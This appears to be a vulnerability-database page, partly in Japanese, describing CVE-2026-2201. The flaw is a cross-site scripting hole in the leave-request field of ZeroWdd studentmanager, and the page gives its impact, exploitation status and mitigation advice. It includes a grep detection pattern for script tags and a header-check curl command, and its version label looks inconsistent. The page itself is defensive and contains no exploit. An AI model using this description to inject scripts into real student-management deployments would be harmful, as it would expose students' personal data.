プラットフォーム
java
コンポーネント
studentmanager
修正版
2151560.0.1
CVE-2026-2201 describes a cross-site scripting (XSS) vulnerability discovered in ZeroWdd studentmanager, affecting versions up to 2151560fc0a50ec00426785ec1e01a3763b380d9. This vulnerability allows attackers to inject malicious scripts into the application, potentially compromising user sessions and data. Due to the rolling release model, specific version numbers are not available, but all users of the affected component should review the provided mitigation strategies.
The XSS vulnerability in ZeroWdd studentmanager allows an attacker to inject arbitrary JavaScript code into the application's web pages. This can be exploited to steal user cookies, redirect users to malicious websites, or deface the application. Successful exploitation could lead to unauthorized access to sensitive student data, including grades, attendance records, and personal information. The remote nature of the vulnerability means an attacker doesn't need to be on the same network as the studentmanager server, significantly broadening the potential attack surface. Given the public disclosure, the risk of exploitation is elevated.
CVE-2026-2201 has been publicly disclosed, indicating a higher probability of exploitation. The vulnerability is considered LOW severity based on the CVSS score. Public proof-of-concept (POC) code is likely to emerge, further increasing the risk. The vulnerability was published on 2026-02-09. It is not currently listed on CISA KEV.
Educational institutions and organizations utilizing ZeroWdd studentmanager are at risk. Specifically, deployments where user-provided data is directly reflected in web pages without proper sanitization are particularly vulnerable. Users who rely on the studentmanager for sensitive student data management should prioritize implementing the recommended mitigations.
• java / server:
grep -r "Reason for Leave" src/main/java/com/wdd/studentmanager/controller/LeaveController.java | grep -i "<script"• generic web:
curl -I <studentmanager_url>/leave/add | grep -i "X-XSS-Protection"disclosure
エクスプロイト状況
EPSS
0.03% (9% パーセンタイル)
CISA SSVC
CVSS ベクトル
Due to the rolling release model of ZeroWdd studentmanager, a direct patch is not immediately available. The primary mitigation strategy involves implementing robust input validation and output encoding on the 'Reason for Leave' field within the LeaveController.java file. Specifically, sanitize user-supplied input to prevent the injection of HTML or JavaScript code. Consider using a WAF (Web Application Firewall) to filter out malicious requests. Regularly review and update the application's codebase to address potential vulnerabilities. After implementing these mitigations, thoroughly test the application to ensure that the vulnerability has been effectively addressed and no new issues have been introduced.
プロジェクトのリポジトリが長年非アクティブであり、特定のバージョン情報が利用できない継続的リリースモデルを使用しているため、このソフトウェアの使用を中止するか、より安全な代替手段を検討することをお勧めします。維持が不可欠な場合は、`src/main/java/com/wdd/studentmanager/controller/LeaveController.java` のコードを手動でレビューおよび修正し、`addLeave` 関数における `Reason for Leave` 引数の入力のエスケープまたはサニタイズを行うことで、XSS 脆弱性を回避してください。
脆弱性分析と重要アラートをメールでお届けします。
CVE-2026-2201 is a cross-site scripting (XSS) vulnerability in ZeroWdd studentmanager versions up to 2151560fc0a50ec00426785ec1e01a3763b380d9, allowing attackers to inject malicious scripts.
If you are using ZeroWdd studentmanager versions up to 2151560fc0a50ec00426785ec1e01a3763b380d9, you are potentially affected by this XSS vulnerability.
Due to the rolling release model, a direct patch is unavailable. Implement input validation and output encoding on the 'Reason for Leave' field, and consider using a WAF.
The vulnerability has been publicly disclosed, increasing the likelihood of exploitation. Monitor your systems for suspicious activity.
Refer to the ZeroWdd project's official communication channels and documentation for the latest advisory regarding CVE-2026-2201.
pom.xml ファイルをアップロードすると、影響の有無を即座にお知らせします。